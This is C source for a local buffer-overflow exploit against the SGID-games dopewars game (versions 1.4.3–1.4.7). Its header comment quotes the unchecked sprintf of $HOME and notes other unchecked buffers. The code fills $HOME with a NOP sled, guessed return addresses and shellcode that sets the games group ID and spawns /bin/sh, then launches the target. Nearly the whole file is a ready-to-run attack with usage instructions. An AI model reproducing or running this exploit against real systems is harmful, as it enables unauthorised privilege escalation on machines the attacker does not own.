/* (linux)dopewars[v1.4.3+] local buffer overflow, by v9[v9@fakehalo.org].
   dopewars is SGID(=2755)=games by install(make install).  this overflow is
   true for versions of dopewars 1.4.3 to 1.4.7(current).

   syntax: ./dopewars_bof [offset] [alignment(0-3)]
           ./dopewars_bof -200 1

   the basic overlow(dopewars.c):
   --
   pt=getenv("HOME");
   if (!pt) return;
   if (strlen(pt) > 770) {
      sprintf(ConfigFile,"Home directory %s too long.",pt);
      ReportError(ConfigFile);
      return;
   }
   sprintf(ConfigFile,"%s/.dopewars",pt);
   --
   "the home directory is too long! so what? lets contiune anyways."

   note: even in the current version of dopewars(1.4.7) there appear to be some
         remote overflow possibilities from server->client(bof the client with
         a bogus server).  you can even overflow the server just by simply
         sending a large string(eip=0x0..).  i am just making a note of lots of
         unchecked buffers.  also, $HOME is too common a overflow for this to
         occur. :) */

#define PATH "/usr/local/bin/dopewars"  // path to the dopewars program.
#define GID 20                          // group id of games.
#define DEFAULT_OFFSET 200              // if no argument #1.
#define DEFAULT_ALIGN 1                 // if no argument #2.

static char exec[]=
 "\xeb\x29\x5e\x31\xc0\xb0\x2e\x31\xdb\xb3"
 "\x00" // soon to be gid=games.
 "\xcd\x80\x89\x76\x08\x31\xc0\x88\x46\x07"
 "\x89\x46\x0c\xb0\x0b\x89\xf3\x8d\x4e\x08"
 "\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40"
 "\xcd\x80\xe8\xd2\xff\xff\xff\x2f\x62\x69"
 "\x6e\x2f\x73\x68\x01"; // my usual shellcode for these situations :)

long esp(void){__asm__("movl %esp,%eax");}
int main(int argc,char **argv){
 char bof[800];
 int i,offset,align;
 long ret;
 if(argc>1){offset=atoi(argv[1]);}
 else{offset=DEFAULT_OFFSET;}
 if(argc>2){
  if(atoi(argv[2])>3||atoi(argv[2])<0){printf("%s: %s is an invalid alignment, use 0-3.\n",argv[0],argv[2]);exit(-1);}
  else{align=atoi(argv[2]);}
 }
 else{align=DEFAULT_ALIGN;}
 ret=(esp()-offset);
 printf("[ return addr: 0x%lx, offset: %d, alignment: %d. ]\n",ret,offset,align);
 exec[10]=GID;
 for(i=align;i<800;i+=4){*(long *)&bof[i]=ret;}
 for(i=0;i<(800-strlen(exec)-50);i++){*(bof+i)=0x90;}
 memcpy(bof+i,exec,strlen(exec));
 setenv("HOME",bof,1);
 if(execlp(PATH,"dopewars",0)){
  printf("%s: defined path %s did not execute correctly.\n",argv[0],PATH);
  exit(-1);
 }
}